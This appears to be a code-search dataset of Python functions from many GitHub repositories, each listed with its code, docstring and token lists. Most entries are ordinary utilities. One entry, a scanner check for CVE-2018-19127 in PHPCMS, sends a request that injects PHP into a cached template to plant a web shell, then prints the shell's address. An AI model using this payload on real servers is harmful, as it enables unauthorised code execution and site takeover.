[ "def", "iou", "(", "boxlist1", ",", "boxlist2", ")", ":", "return", "np_box_ops", ".", "iou", "(", "boxlist1", ".", "get", "(", ")", ",", "boxlist2", ".", "get", "(", ")", ")" ]
https://github.com/ambakick/Person-Detection-and-Tracking/blob/f925394ac29b5cf321f1ce89a71b193381519a0b/utils/np_box_list_ops.py#L65-L75
CamDavidsonPilon/lifelines
9be26a9a8720e8536e9828e954bb91d559a3016f
lifelines/fitters/__init__.py
python
ParametricUnivariateFitter.confidence_interval_cumulative_hazard_
(self)
return self.confidence_interval_
The confidence interval of the cumulative hazard. This is an alias for ``confidence_interval_``.
The confidence interval of the cumulative hazard. This is an alias for ``confidence_interval_``.
[ "The", "confidence", "interval", "of", "the", "cumulative", "hazard", ".", "This", "is", "an", "alias", "for", "confidence_interval_", "." ]
def confidence_interval_cumulative_hazard_(self) -> pd.DataFrame: """ The confidence interval of the cumulative hazard. This is an alias for ``confidence_interval_``. """ return self.confidence_interval_
[ "def", "confidence_interval_cumulative_hazard_", "(", "self", ")", "->", "pd", ".", "DataFrame", ":", "return", "self", ".", "confidence_interval_" ]
https://github.com/CamDavidsonPilon/lifelines/blob/9be26a9a8720e8536e9828e954bb91d559a3016f/lifelines/fitters/__init__.py#L1112-L1116
angr/angr
4b04d56ace135018083d36d9083805be8146688b
angr/analyses/cfg/segment_list.py
python
Segment.size
(self)
return self.end - self.start
Calculate the size of the Segment. :return: Size of the Segment. :rtype: int
Calculate the size of the Segment.
[ "Calculate", "the", "size", "of", "the", "Segment", "." ]
def size(self): """ Calculate the size of the Segment. :return: Size of the Segment. :rtype: int """ return self.end - self.start
[ "def", "size", "(", "self", ")", ":", "return", "self", ".", "end", "-", "self", ".", "start" ]
https://github.com/angr/angr/blob/4b04d56ace135018083d36d9083805be8146688b/angr/analyses/cfg/segment_list.py#L35-L42
emesene/emesene
4548a4098310e21b16437bb36223a7f632a4f7bc
emesene/e3/xmpp/SleekXMPP/sleekxmpp/plugins/base.py
python
BasePlugin.__setattr__
(self, key, value)
Provide direct assignment to configuration fields. If the standard configuration includes the option `'foo'`, then assigning to `self.foo` should be the same as assigning to `self.config['foo']`.
Provide direct assignment to configuration fields.
[ "Provide", "direct", "assignment", "to", "configuration", "fields", "." ]
def __setattr__(self, key, value): """Provide direct assignment to configuration fields. If the standard configuration includes the option `'foo'`, then assigning to `self.foo` should be the same as assigning to `self.config['foo']`. """ if key in self.default_config: self.config[key] = value else: super(BasePlugin, self).__setattr__(key, value)
[ "def", "__setattr__", "(", "self", ",", "key", ",", "value", ")", ":", "if", "key", "in", "self", ".", "default_config", ":", "self", ".", "config", "[", "key", "]", "=", "value", "else", ":", "super", "(", "BasePlugin", ",", "self", ")", ".", "__s...
https://github.com/emesene/emesene/blob/4548a4098310e21b16437bb36223a7f632a4f7bc/emesene/e3/xmpp/SleekXMPP/sleekxmpp/plugins/base.py#L306-L316
littlecodersh/MyPlatform
6f9a946605466f580205f6e9e96e533720fce578
vendor/requests/utils.py
python
unquote_header_value
(value, is_filename=False)
return value
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote.
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting.
[ "r", "Unquotes", "a", "header", "value", ".", "(", "Reversal", "of", ":", "func", ":", "quote_header_value", ")", ".", "This", "does", "not", "use", "the", "real", "unquoting", "but", "what", "browsers", "are", "actually", "using", "for", "quoting", "." ]
def unquote_header_value(value, is_filename=False): r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote. """ if value and value[0] == value[-1] == '"': # this is not the real unquoting, but fixing this so that the # RFC is met will result in bugs with internet explorer and # probably some other browsers as well. IE for example is # uploading files with "C:\foo\bar.txt" as filename value = value[1:-1] # if this is a filename and the starting characters look like # a UNC path, then just return the value without quotes. Using the # replace sequence below on a UNC path has the effect of turning # the leading double slash into a single slash and then # _fix_ie_filename() doesn't work correctly. See #458. if not is_filename or value[:2] != '\\\\': return value.replace('\\\\', '\\').replace('\\"', '"') return value
[ "def", "unquote_header_value", "(", "value", ",", "is_filename", "=", "False", ")", ":", "if", "value", "and", "value", "[", "0", "]", "==", "value", "[", "-", "1", "]", "==", "'\"'", ":", "# this is not the real unquoting, but fixing this so that the", "# RFC i...
https://github.com/littlecodersh/MyPlatform/blob/6f9a946605466f580205f6e9e96e533720fce578/vendor/requests/utils.py#L264-L285
couchbase/couchbase-python-client
58ccfd42af320bde6b733acf094fd5a4cf34e0ad
couchbase_core/views/iterator.py
python
get_row_doc
(row_json)
return row_json.get('__DOCRESULT__')
Gets the document for the given parsed JSON row. Use this function in custom :class:`~.RowProcessor` implementations to extract the actual document. The document itself is stored within a private field of the row itself, and should only be accessed by this function. :param dict row_json: The parsed row (passed to the processor) :return: The document, or None
Gets the document for the given parsed JSON row.
[ "Gets", "the", "document", "for", "the", "given", "parsed", "JSON", "row", "." ]
def get_row_doc(row_json): """ Gets the document for the given parsed JSON row. Use this function in custom :class:`~.RowProcessor` implementations to extract the actual document. The document itself is stored within a private field of the row itself, and should only be accessed by this function. :param dict row_json: The parsed row (passed to the processor) :return: The document, or None """ return row_json.get('__DOCRESULT__')
[ "def", "get_row_doc", "(", "row_json", ")", ":", "return", "row_json", ".", "get", "(", "'__DOCRESULT__'", ")" ]
https://github.com/couchbase/couchbase-python-client/blob/58ccfd42af320bde6b733acf094fd5a4cf34e0ad/couchbase_core/views/iterator.py#L123-L135
allenai/allennlp
a3d71254fcc0f3615910e9c3d48874515edf53e0
allennlp/data/vocabulary.py
python
Vocabulary.__init__
( self, counter: Dict[str, Dict[str, int]] = None, min_count: Dict[str, int] = None, max_vocab_size: Union[int, Dict[str, int]] = None, non_padded_namespaces: Iterable[str] = DEFAULT_NON_PADDED_NAMESPACES, pretrained_files: Optional[Dict[str, str]] = None, only_include_pretrained_words: bool = False, tokens_to_add: Dict[str, List[str]] = None, min_pretrained_embeddings: Dict[str, int] = None, padding_token: Optional[str] = DEFAULT_PADDING_TOKEN, oov_token: Optional[str] = DEFAULT_OOV_TOKEN, )
[]
def __init__( self, counter: Dict[str, Dict[str, int]] = None, min_count: Dict[str, int] = None, max_vocab_size: Union[int, Dict[str, int]] = None, non_padded_namespaces: Iterable[str] = DEFAULT_NON_PADDED_NAMESPACES, pretrained_files: Optional[Dict[str, str]] = None, only_include_pretrained_words: bool = False, tokens_to_add: Dict[str, List[str]] = None, min_pretrained_embeddings: Dict[str, int] = None, padding_token: Optional[str] = DEFAULT_PADDING_TOKEN, oov_token: Optional[str] = DEFAULT_OOV_TOKEN, ) -> None: self._padding_token = padding_token if padding_token is not None else DEFAULT_PADDING_TOKEN self._oov_token = oov_token if oov_token is not None else DEFAULT_OOV_TOKEN self._non_padded_namespaces = set(non_padded_namespaces) self._token_to_index = _TokenToIndexDefaultDict( self._non_padded_namespaces, self._padding_token, self._oov_token ) self._index_to_token = _IndexToTokenDefaultDict( self._non_padded_namespaces, self._padding_token, self._oov_token ) self._retained_counter: Optional[Dict[str, Dict[str, int]]] = None # Made an empty vocabulary, now extend it. self._extend( counter, min_count, max_vocab_size, non_padded_namespaces, pretrained_files, only_include_pretrained_words, tokens_to_add, min_pretrained_embeddings, )
[ "def", "__init__", "(", "self", ",", "counter", ":", "Dict", "[", "str", ",", "Dict", "[", "str", ",", "int", "]", "]", "=", "None", ",", "min_count", ":", "Dict", "[", "str", ",", "int", "]", "=", "None", ",", "max_vocab_size", ":", "Union", "["...
https://github.com/allenai/allennlp/blob/a3d71254fcc0f3615910e9c3d48874515edf53e0/allennlp/data/vocabulary.py#L223-L260
lightkurve/lightkurve
70d1c4cd1ab30f24c83e54bdcea4dd16624bfd9c
src/lightkurve/targetpixelfile.py
python
TargetPixelFile.time
(self)
return Time( time_values, scale=self.hdu[1].header.get("TIMESYS", "tdb").lower(), format=time_format, )
Returns the time for all good-quality cadences.
Returns the time for all good-quality cadences.
[ "Returns", "the", "time", "for", "all", "good", "-", "quality", "cadences", "." ]
def time(self) -> Time: """Returns the time for all good-quality cadences.""" time_values = self.hdu[1].data["TIME"][self.quality_mask] # Some data products have missing time values; # we need to set these to zero or `Time` cannot be instantiated. time_values[~np.isfinite(time_values)] = 0 bjdrefi = self.hdu[1].header.get("BJDREFI") if bjdrefi == 2454833: time_format = "bkjd" elif bjdrefi == 2457000: time_format = "btjd" else: time_format = "jd" return Time( time_values, scale=self.hdu[1].header.get("TIMESYS", "tdb").lower(), format=time_format, )
[ "def", "time", "(", "self", ")", "->", "Time", ":", "time_values", "=", "self", ".", "hdu", "[", "1", "]", ".", "data", "[", "\"TIME\"", "]", "[", "self", ".", "quality_mask", "]", "# Some data products have missing time values;", "# we need to set these to zero...
https://github.com/lightkurve/lightkurve/blob/70d1c4cd1ab30f24c83e54bdcea4dd16624bfd9c/src/lightkurve/targetpixelfile.py#L319-L338
avocado-framework/avocado
1f9b3192e8ba47d029c33fe21266bd113d17811f
avocado/core/loader.py
python
SimpleFileLoader.discover
(self, reference, which_tests=DiscoverMode.DEFAULT)
return tests
Discover (possible) tests from a directory. Recursively walk in a directory and find tests params. The tests are returned in alphabetic order. Afterwards when "allowed_test_types" is supplied it verifies if all found tests are of the allowed type. If not return None (even on partial match). :param reference: the directory path to inspect. :param which_tests: Limit tests to be displayed :type which_tests: :class:`DiscoverMode` :return: list of matching tests
Discover (possible) tests from a directory.
[ "Discover", "(", "possible", ")", "tests", "from", "a", "directory", "." ]
def discover(self, reference, which_tests=DiscoverMode.DEFAULT): """ Discover (possible) tests from a directory. Recursively walk in a directory and find tests params. The tests are returned in alphabetic order. Afterwards when "allowed_test_types" is supplied it verifies if all found tests are of the allowed type. If not return None (even on partial match). :param reference: the directory path to inspect. :param which_tests: Limit tests to be displayed :type which_tests: :class:`DiscoverMode` :return: list of matching tests """ tests = self._discover(reference, which_tests) if self.test_type: mapping = self.get_type_label_mapping() test_class = next(key for key, value in mapping.items() if value == self.test_type) for tst in tests: if not self._is_matching_test_class(tst[0], test_class): return None return tests
[ "def", "discover", "(", "self", ",", "reference", ",", "which_tests", "=", "DiscoverMode", ".", "DEFAULT", ")", ":", "tests", "=", "self", ".", "_discover", "(", "reference", ",", "which_tests", ")", "if", "self", ".", "test_type", ":", "mapping", "=", "...
https://github.com/avocado-framework/avocado/blob/1f9b3192e8ba47d029c33fe21266bd113d17811f/avocado/core/loader.py#L396-L420
mesonbuild/meson
a22d0f9a0a787df70ce79b05d0c45de90a970048
mesonbuild/compilers/vala.py
python
ValaCompiler.get_werror_args
(self)
return ['--fatal-warnings']
[]
def get_werror_args(self) -> T.List[str]: return ['--fatal-warnings']
[ "def", "get_werror_args", "(", "self", ")", "->", "T", ".", "List", "[", "str", "]", ":", "return", "[", "'--fatal-warnings'", "]" ]
https://github.com/mesonbuild/meson/blob/a22d0f9a0a787df70ce79b05d0c45de90a970048/mesonbuild/compilers/vala.py#L71-L72
zbyte64/django-hyperadmin
9ac2ae284b76efb3c50a1c2899f383a27154cb54
hyperadmin/resources/endpoints.py
python
ResourceEndpoint.api_permission_check
(self, api_request, endpoint)
return self.resource.api_permission_check(api_request, endpoint)
[]
def api_permission_check(self, api_request, endpoint): return self.resource.api_permission_check(api_request, endpoint)
[ "def", "api_permission_check", "(", "self", ",", "api_request", ",", "endpoint", ")", ":", "return", "self", ".", "resource", ".", "api_permission_check", "(", "api_request", ",", "endpoint", ")" ]
https://github.com/zbyte64/django-hyperadmin/blob/9ac2ae284b76efb3c50a1c2899f383a27154cb54/hyperadmin/resources/endpoints.py#L59-L60
MrYsLab/pymata-aio
ccd1fd361d85a71cdde1c46cc733155ac43e93f7
pymata_aio/pymata3.py
python
PyMata3.encoder_read
(self, pin)
This method retrieves the latest encoder data value. It is a FirmataPlus feature. :param pin: Encoder Pin :returns: encoder data value
This method retrieves the latest encoder data value. It is a FirmataPlus feature.
[ "This", "method", "retrieves", "the", "latest", "encoder", "data", "value", ".", "It", "is", "a", "FirmataPlus", "feature", "." ]
def encoder_read(self, pin): """ This method retrieves the latest encoder data value. It is a FirmataPlus feature. :param pin: Encoder Pin :returns: encoder data value """ try: task = asyncio.ensure_future(self.core.encoder_read(pin)) value = self.loop.run_until_complete(task) return value except RuntimeError: self.shutdown()
[ "def", "encoder_read", "(", "self", ",", "pin", ")", ":", "try", ":", "task", "=", "asyncio", ".", "ensure_future", "(", "self", ".", "core", ".", "encoder_read", "(", "pin", ")", ")", "value", "=", "self", ".", "loop", ".", "run_until_complete", "(", ...
https://github.com/MrYsLab/pymata-aio/blob/ccd1fd361d85a71cdde1c46cc733155ac43e93f7/pymata_aio/pymata3.py#L201-L215
accel-brain/accel-brain-code
86f489dc9be001a3bae6d053f48d6b57c0bedb95
Accel-Brain-Base/accelbrainbase/iteratabledata/_mxnet/labeled_csv_iterator.py
python
LabeledCSVIterator.generate_inferenced_samples
(self)
Draw and generate data. The targets will be drawn from all image file sorted in ascending order by file name. Returns: `Tuple` data. The shape is ... - `None`. - `None`. - `mxnet.ndarray` of observed data points in test. - file path.
Draw and generate data. The targets will be drawn from all image file sorted in ascending order by file name.
[ "Draw", "and", "generate", "data", ".", "The", "targets", "will", "be", "drawn", "from", "all", "image", "file", "sorted", "in", "ascending", "order", "by", "file", "name", "." ]
def generate_inferenced_samples(self): ''' Draw and generate data. The targets will be drawn from all image file sorted in ascending order by file name. Returns: `Tuple` data. The shape is ... - `None`. - `None`. - `mxnet.ndarray` of observed data points in test. - file path. ''' for i in range(1, self.__test_observed_arr.shape[0] // self.batch_size): test_batch_arr = self.__test_observed_arr[(i-1)*self.batch_size:i*self.batch_size] yield None, None, test_batch_arr, None
[ "def", "generate_inferenced_samples", "(", "self", ")", ":", "for", "i", "in", "range", "(", "1", ",", "self", ".", "__test_observed_arr", ".", "shape", "[", "0", "]", "//", "self", ".", "batch_size", ")", ":", "test_batch_arr", "=", "self", ".", "__test...
https://github.com/accel-brain/accel-brain-code/blob/86f489dc9be001a3bae6d053f48d6b57c0bedb95/Accel-Brain-Base/accelbrainbase/iteratabledata/_mxnet/labeled_csv_iterator.py#L121-L135
garywiz/chaperone
9ff2c3a5b9c6820f8750320a564ea214042df06f
chaperone/cutil/notify.py
python
NotifyListener.__init__
(self, socket_name, **kwargs)
[]
def __init__(self, socket_name, **kwargs): super().__init__(**kwargs) self._socket_name = socket_name
[ "def", "__init__", "(", "self", ",", "socket_name", ",", "*", "*", "kwargs", ")", ":", "super", "(", ")", ".", "__init__", "(", "*", "*", "kwargs", ")", "self", ".", "_socket_name", "=", "socket_name" ]
https://github.com/garywiz/chaperone/blob/9ff2c3a5b9c6820f8750320a564ea214042df06f/chaperone/cutil/notify.py#L42-L44
AppScale/gts
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
AppServer/google/appengine/api/app_logging.py
python
AppLogsHandler._AppLogsMessage
(self, record)
return "LOG %d %d %s\n" % (self._AppLogsLevel(record.levelno), long(record.created * 1000 * 1000), message)
Converts the log record into a log line.
Converts the log record into a log line.
[ "Converts", "the", "log", "record", "into", "a", "log", "line", "." ]
def _AppLogsMessage(self, record): """Converts the log record into a log line.""" message = self.format(record).replace("\r\n", NEWLINE_REPLACEMENT) message = message.replace("\r", NEWLINE_REPLACEMENT) message = message.replace("\n", NEWLINE_REPLACEMENT) return "LOG %d %d %s\n" % (self._AppLogsLevel(record.levelno), long(record.created * 1000 * 1000), message)
[ "def", "_AppLogsMessage", "(", "self", ",", "record", ")", ":", "message", "=", "self", ".", "format", "(", "record", ")", ".", "replace", "(", "\"\\r\\n\"", ",", "NEWLINE_REPLACEMENT", ")", "message", "=", "message", ".", "replace", "(", "\"\\r\"", ",", ...
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/google/appengine/api/app_logging.py#L88-L99
dstamoulis/single-path-nas
21c1f3e9c790e591749c0fb861bff3737b6d5fc7
runtime-modeling/imagenet_input.py
python
ImageNetTFExampleInput.dataset_parser
(self, value)
return image, label
Parses an image and its label from a serialized ResNet-50 TFExample. Args: value: serialized string containing an ImageNet TFExample. Returns: Returns a tuple of (image, label) from the TFExample.
Parses an image and its label from a serialized ResNet-50 TFExample.
[ "Parses", "an", "image", "and", "its", "label", "from", "a", "serialized", "ResNet", "-", "50", "TFExample", "." ]
def dataset_parser(self, value): """Parses an image and its label from a serialized ResNet-50 TFExample. Args: value: serialized string containing an ImageNet TFExample. Returns: Returns a tuple of (image, label) from the TFExample. """ keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, ''), 'image/class/label': tf.FixedLenFeature([], tf.int64, -1), } parsed = tf.parse_single_example(value, keys_to_features) image_bytes = tf.reshape(parsed['image/encoded'], shape=[]) image = self.image_preprocessing_fn( image_bytes=image_bytes, is_training=self.is_training, image_size=self.image_size, use_bfloat16=self.use_bfloat16) # Subtract one so that labels are in [0, 1000). label = tf.cast( tf.reshape(parsed['image/class/label'], shape=[]), dtype=tf.int32) - 1 return image, label
[ "def", "dataset_parser", "(", "self", ",", "value", ")", ":", "keys_to_features", "=", "{", "'image/encoded'", ":", "tf", ".", "FixedLenFeature", "(", "(", ")", ",", "tf", ".", "string", ",", "''", ")", ",", "'image/class/label'", ":", "tf", ".", "FixedL...
https://github.com/dstamoulis/single-path-nas/blob/21c1f3e9c790e591749c0fb861bff3737b6d5fc7/runtime-modeling/imagenet_input.py#L91-L118
lad1337/XDM
0c1b7009fe00f06f102a6f67c793478f515e7efe
site-packages/requests/packages/urllib3/filepost.py
python
choose_boundary
()
return uuid4().hex
Our embarassingly-simple replacement for mimetools.choose_boundary.
Our embarassingly-simple replacement for mimetools.choose_boundary.
[ "Our", "embarassingly", "-", "simple", "replacement", "for", "mimetools", ".", "choose_boundary", "." ]
def choose_boundary(): """ Our embarassingly-simple replacement for mimetools.choose_boundary. """ return uuid4().hex
[ "def", "choose_boundary", "(", ")", ":", "return", "uuid4", "(", ")", ".", "hex" ]
https://github.com/lad1337/XDM/blob/0c1b7009fe00f06f102a6f67c793478f515e7efe/site-packages/requests/packages/urllib3/filepost.py#L20-L24
ctxis/CAPE
dae9fa6a254ecdbabeb7eb0d2389fa63722c1e82
lib/maec/maec41.py
python
regStringToHive
(reg_string)
return normalized_key.split("\\")[0]
Maps a string representing a Registry Key from a NT* API call input to its normalized hive
Maps a string representing a Registry Key from a NT* API call input to its normalized hive
[ "Maps", "a", "string", "representing", "a", "Registry", "Key", "from", "a", "NT", "*", "API", "call", "input", "to", "its", "normalized", "hive" ]
def regStringToHive(reg_string): """Maps a string representing a Registry Key from a NT* API call input to its normalized hive""" normalized_key = fix_key(reg_string) return normalized_key.split("\\")[0]
[ "def", "regStringToHive", "(", "reg_string", ")", ":", "normalized_key", "=", "fix_key", "(", "reg_string", ")", "return", "normalized_key", ".", "split", "(", "\"\\\\\"", ")", "[", "0", "]" ]
https://github.com/ctxis/CAPE/blob/dae9fa6a254ecdbabeb7eb0d2389fa63722c1e82/lib/maec/maec41.py#L1623-L1626
Azure/azure-linux-extensions
a42ef718c746abab2b3c6a21da87b29e76364558
OSPatching/azure/servicemanagement/__init__.py
python
_management_error_handler
(http_error)
return _general_error_handler(http_error)
Simple error handler for management service.
Simple error handler for management service.
[ "Simple", "error", "handler", "for", "management", "service", "." ]
def _management_error_handler(http_error): ''' Simple error handler for management service. ''' return _general_error_handler(http_error)
[ "def", "_management_error_handler", "(", "http_error", ")", ":", "return", "_general_error_handler", "(", "http_error", ")" ]
https://github.com/Azure/azure-linux-extensions/blob/a42ef718c746abab2b3c6a21da87b29e76364558/OSPatching/azure/servicemanagement/__init__.py#L1334-L1336
ktbyers/pynet
f01ca44afe1db1e64828fc93028f67410174719e
pyth_ans_ecourse/class8/ex8_proc_w_queue.py
python
show_version_queue
(a_device, output_q)
Use Netmiko to execute show version. Use a queue to pass the data back to the main process.
Use Netmiko to execute show version. Use a queue to pass the data back to the main process.
[ "Use", "Netmiko", "to", "execute", "show", "version", ".", "Use", "a", "queue", "to", "pass", "the", "data", "back", "to", "the", "main", "process", "." ]
def show_version_queue(a_device, output_q): ''' Use Netmiko to execute show version. Use a queue to pass the data back to the main process. ''' output_dict = {} creds = a_device.credentials remote_conn = ConnectHandler(device_type=a_device.device_type, ip=a_device.ip_address, username=creds.username, password=creds.password, port=a_device.port, secret='', verbose=False) output = ('#' * 80) + "\n" output += remote_conn.send_command_expect("show version") + "\n" output += ('#' * 80) + "\n" output_dict[a_device.device_name] = output output_q.put(output_dict)
[ "def", "show_version_queue", "(", "a_device", ",", "output_q", ")", ":", "output_dict", "=", "{", "}", "creds", "=", "a_device", ".", "credentials", "remote_conn", "=", "ConnectHandler", "(", "device_type", "=", "a_device", ".", "device_type", ",", "ip", "=", ...
https://github.com/ktbyers/pynet/blob/f01ca44afe1db1e64828fc93028f67410174719e/pyth_ans_ecourse/class8/ex8_proc_w_queue.py#L16-L32
AppScale/gts
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
AppServer/lib/django-1.2/django/db/backends/__init__.py
python
BaseDatabaseOperations.last_executed_query
(self, cursor, sql, params)
return smart_unicode(sql) % u_params
Returns a string of the query last executed by the given cursor, with placeholders replaced with actual values. `sql` is the raw query containing placeholders, and `params` is the sequence of parameters. These are used by default, but this method exists for database backends to provide a better implementation according to their own quoting schemes.
Returns a string of the query last executed by the given cursor, with placeholders replaced with actual values.
[ "Returns", "a", "string", "of", "the", "query", "last", "executed", "by", "the", "given", "cursor", "with", "placeholders", "replaced", "with", "actual", "values", "." ]
def last_executed_query(self, cursor, sql, params): """ Returns a string of the query last executed by the given cursor, with placeholders replaced with actual values. `sql` is the raw query containing placeholders, and `params` is the sequence of parameters. These are used by default, but this method exists for database backends to provide a better implementation according to their own quoting schemes. """ from django.utils.encoding import smart_unicode, force_unicode # Convert params to contain Unicode values. to_unicode = lambda s: force_unicode(s, strings_only=True, errors='replace') if isinstance(params, (list, tuple)): u_params = tuple([to_unicode(val) for val in params]) else: u_params = dict([(to_unicode(k), to_unicode(v)) for k, v in params.items()]) return smart_unicode(sql) % u_params
[ "def", "last_executed_query", "(", "self", ",", "cursor", ",", "sql", ",", "params", ")", ":", "from", "django", ".", "utils", ".", "encoding", "import", "smart_unicode", ",", "force_unicode", "# Convert params to contain Unicode values.", "to_unicode", "=", "lambda...
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/lib/django-1.2/django/db/backends/__init__.py#L197-L216
sfu-db/dataprep
6dfb9c659e8bf73f07978ae195d0372495c6f118
dataprep/clean/clean_address.py
python
_clean_zip
(result_dict: Dict[str, str], zipcode: str)
adds zipcode to result_dict
adds zipcode to result_dict
[ "adds", "zipcode", "to", "result_dict" ]
def _clean_zip(result_dict: Dict[str, str], zipcode: str) -> None: """ adds zipcode to result_dict """ result_dict["zipcode"] = zipcode
[ "def", "_clean_zip", "(", "result_dict", ":", "Dict", "[", "str", ",", "str", "]", ",", "zipcode", ":", "str", ")", "->", "None", ":", "result_dict", "[", "\"zipcode\"", "]", "=", "zipcode" ]
https://github.com/sfu-db/dataprep/blob/6dfb9c659e8bf73f07978ae195d0372495c6f118/dataprep/clean/clean_address.py#L433-L437
open-cogsci/OpenSesame
c4a3641b097a80a76937edbd8c365f036bcc9705
openexp/_canvas/canvas.py
python
Canvas.init_display
(experiment)
visible: False desc: Initializes the display before the experiment begins. arguments: experiment: desc: An experiment object. type: experiment
visible: False
[ "visible", ":", "False" ]
def init_display(experiment): """ visible: False desc: Initializes the display before the experiment begins. arguments: experiment: desc: An experiment object. type: experiment """ raise NotImplementedError()
[ "def", "init_display", "(", "experiment", ")", ":", "raise", "NotImplementedError", "(", ")" ]
https://github.com/open-cogsci/OpenSesame/blob/c4a3641b097a80a76937edbd8c365f036bcc9705/openexp/_canvas/canvas.py#L1443-L1457
Theano/Theano
8fd9203edfeecebced9344b0c70193be292a9ade
theano/tensor/var.py
python
_tensor_py_operators.sort
(self, axis=-1, kind='quicksort', order=None)
return theano.tensor.sort(self, axis, kind, order)
See `theano.tensor.sort`.
See `theano.tensor.sort`.
[ "See", "theano", ".", "tensor", ".", "sort", "." ]
def sort(self, axis=-1, kind='quicksort', order=None): """See `theano.tensor.sort`.""" return theano.tensor.sort(self, axis, kind, order)
[ "def", "sort", "(", "self", ",", "axis", "=", "-", "1", ",", "kind", "=", "'quicksort'", ",", "order", "=", "None", ")", ":", "return", "theano", ".", "tensor", ".", "sort", "(", "self", ",", "axis", ",", "kind", ",", "order", ")" ]
https://github.com/Theano/Theano/blob/8fd9203edfeecebced9344b0c70193be292a9ade/theano/tensor/var.py#L740-L742
mchristopher/PokemonGo-DesktopMap
ec37575f2776ee7d64456e2a1f6b6b78830b4fe0
app/pywin/Lib/collections.py
python
OrderedDict.items
(self)
return [(key, self[key]) for key in self]
od.items() -> list of (key, value) pairs in od
od.items() -> list of (key, value) pairs in od
[ "od", ".", "items", "()", "-", ">", "list", "of", "(", "key", "value", ")", "pairs", "in", "od" ]
def items(self): 'od.items() -> list of (key, value) pairs in od' return [(key, self[key]) for key in self]
[ "def", "items", "(", "self", ")", ":", "return", "[", "(", "key", ",", "self", "[", "key", "]", ")", "for", "key", "in", "self", "]" ]
https://github.com/mchristopher/PokemonGo-DesktopMap/blob/ec37575f2776ee7d64456e2a1f6b6b78830b4fe0/app/pywin/Lib/collections.py#L125-L127
bendmorris/static-python
2e0f8c4d7ed5b359dc7d8a75b6fb37e6b6c5c473
Lib/wsgiref/headers.py
python
Headers.__setitem__
(self, name, val)
Set the value of a header.
Set the value of a header.
[ "Set", "the", "value", "of", "a", "header", "." ]
def __setitem__(self, name, val): """Set the value of a header.""" del self[name] self._headers.append( (self._convert_string_type(name), self._convert_string_type(val)))
[ "def", "__setitem__", "(", "self", ",", "name", ",", "val", ")", ":", "del", "self", "[", "name", "]", "self", ".", "_headers", ".", "append", "(", "(", "self", ".", "_convert_string_type", "(", "name", ")", ",", "self", ".", "_convert_string_type", "(...
https://github.com/bendmorris/static-python/blob/2e0f8c4d7ed5b359dc7d8a75b6fb37e6b6c5c473/Lib/wsgiref/headers.py#L52-L56
theislab/anndata
664e32b0aa6625fe593370d37174384c05abfd4e
anndata/compat/_overloaded_dict.py
python
KeyOverload._set
(parent, key, value)
[]
def _set(parent, key, value): parent.data[key] = value
[ "def", "_set", "(", "parent", ",", "key", ",", "value", ")", ":", "parent", ".", "data", "[", "key", "]", "=", "value" ]
https://github.com/theislab/anndata/blob/664e32b0aa6625fe593370d37174384c05abfd4e/anndata/compat/_overloaded_dict.py#L52-L53
taomujian/linbing
fe772a58f41e3b046b51a866bdb7e4655abaf51a
python/app/plugins/http/Phpcms/CVE_2018_19127.py
python
CVE_2018_19127_BaseVerify.check
(self)
检测是否存在漏洞 :param: :return bool True or False: 是否存在漏洞
检测是否存在漏洞
[ "检测是否存在漏洞" ]
def check(self): """ 检测是否存在漏洞 :param: :return bool True or False: 是否存在漏洞 """ url = self.url + "/type.php?template=tag_(){};@unlink(FILE);assert($_POST[secfree]);{//../rss" try: results = request.get(url, headers = self.headers).text c = re.findall(r"function.assert'>(.+?)</a>",results) if c[0] == "function.assert": print('存在CVE-2018-19127漏洞,WebShell地址为:' + self.url + '/data/cache_template/rss.tpl.php|secfree') return True else: print('不存在CVE-2018-19127漏洞') return False except Exception as e: print(e) print('不存在CVE-2018-19127漏洞') return False finally: pass
[ "def", "check", "(", "self", ")", ":", "url", "=", "self", ".", "url", "+", "\"/type.php?template=tag_(){};@unlink(FILE);assert($_POST[secfree]);{//../rss\"", "try", ":", "results", "=", "request", ".", "get", "(", "url", ",", "headers", "=", "self", ".", "heade...
https://github.com/taomujian/linbing/blob/fe772a58f41e3b046b51a866bdb7e4655abaf51a/python/app/plugins/http/Phpcms/CVE_2018_19127.py#L23-L48
freedombox/FreedomBox
335a7f92cc08f27981f838a7cddfc67740598e54
plinth/notification.py
python
Notification.get_display_context
(request, user)
return {'notifications': notes, 'max_severity': max_severity}
Return a list of notifications meant for display to a user.
Return a list of notifications meant for display to a user.
[ "Return", "a", "list", "of", "notifications", "meant", "for", "display", "to", "a", "user", "." ]
def get_display_context(request, user): """Return a list of notifications meant for display to a user.""" notifications = Notification.list(user=user) max_severity = max(notifications, default=None, key=lambda note: note.severity_value) max_severity = max_severity.severity if max_severity else None notes = [] for note in notifications: data = Notification._translate_dict(note.data, note.data) actions = copy.deepcopy(note.actions) for action in actions: if 'text' in action: action['text'] = Notification._translate( action['text'], data) body = Notification._render(request, note.body_template, data) notes.append({ 'id': note.id, 'app_id': note.app_id, 'severity': note.severity, 'title': Notification._translate(note.title, data), 'message': Notification._translate(note.message, data), 'body': body, 'actions': actions, 'data': data, 'created_time': note.created_time, 'last_update_time': note.last_update_time, 'user': note.user, 'group': note.group, 'dismissed': note.dismissed, }) return {'notifications': notes, 'max_severity': max_severity}
[ "def", "get_display_context", "(", "request", ",", "user", ")", ":", "notifications", "=", "Notification", ".", "list", "(", "user", "=", "user", ")", "max_severity", "=", "max", "(", "notifications", ",", "default", "=", "None", ",", "key", "=", "lambda",...
https://github.com/freedombox/FreedomBox/blob/335a7f92cc08f27981f838a7cddfc67740598e54/plinth/notification.py#L332-L365
bruderstein/PythonScript
df9f7071ddf3a079e3a301b9b53a6dc78cf1208f
PythonScript/src/CreateWrapper.py
python
contents
(filename)
[]
def contents(filename): with open(filename) as f: return f.read()
[ "def", "contents", "(", "filename", ")", ":", "with", "open", "(", "filename", ")", "as", "f", ":", "return", "f", ".", "read", "(", ")" ]
